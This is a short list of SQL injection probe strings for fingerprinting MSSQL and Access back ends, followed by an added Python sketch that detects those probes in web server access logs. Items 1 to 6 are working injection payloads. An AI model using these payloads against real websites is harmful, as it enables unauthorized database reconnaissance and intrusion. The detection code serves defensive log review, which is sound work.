1. Check whether injection is possible: ;and 1=1 ;and 1=2
2. Preliminary check for whether the backend is MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [query condition] and ''='
4. When a search does not filter its parameter: 'and [query condition] and '%25'='
5. Identify the database system:
;and (select count(*) from sysobjects)>0    (MSSQL)
;and (select count(*) from msysobjects)>0    (Access)
6. Guess the database: ;and (select Count(*) from [database name])>0
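
A detection-side view of the probes in items 1 to 6, as an added example that is not part of the original page: a Python sketch that URL-decodes the query string of access-log request lines and tags the probe forms listed above. The log lines, the signature names and the `classify` function are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One signature per probe form in the list above (names are illustrative).
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),           # item 1
    "mssql_user_probe": re.compile(r"\band\s+user\s*>\s*0\b", re.I),        # item 2
    "string_close_probe": re.compile(r"'\s*and\b.+?\band\s+'%?'\s*=\s*'", re.I),  # items 3, 4
    "mssql_fingerprint": re.compile(r"\bfrom\s+sysobjects\b", re.I),        # item 5
    "access_fingerprint": re.compile(r"\bfrom\s+msysobjects\b", re.I),      # item 5
    "count_probe": re.compile(                                              # items 5, 6
        r"\(\s*select\s+count\s*\(\s*\*\s*\)\s+from\s+[^)]+\)\s*>\s*0", re.I),
}

REQUEST_LINE = re.compile(r"^\S+\s+(.*)\s+HTTP/\d(?:\.\d)?$")

def decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded probes are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_line):
    """Return the sorted names of signatures matching the request's query string."""
    m = REQUEST_LINE.match(request_line.strip())
    target = m.group(1) if m else request_line
    _, _, query = target.partition("?")
    text = decode(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

# Constructed request lines; paths and parameter names are placeholders.
SAMPLE_LINES = [
    "GET /news.asp?id=12 HTTP/1.1",
    "GET /news.asp?id=12;and%201=1 HTTP/1.1",
    "GET /news.asp?id=12;and%20user%3E0 HTTP/1.1",
    "GET /news.asp?id=12;and%20(select%20count(*)%20from%20sysobjects)%3E0 HTTP/1.1",
    "GET /news.asp?id=12;and%20(select%20count(*)%20from%20msysobjects)%3E0 HTTP/1.1",
    "GET /search.asp?q=a%27and%202%3E1%20and%20%27%25%27=%27 HTTP/1.1",
    "GET /search.asp?q=sand+and+gravel HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify(line) or ["clean"], line)
```

These signatures match only the literal probe forms listed on this page, so a hit is a triage signal for log review rather than a complete injection filter.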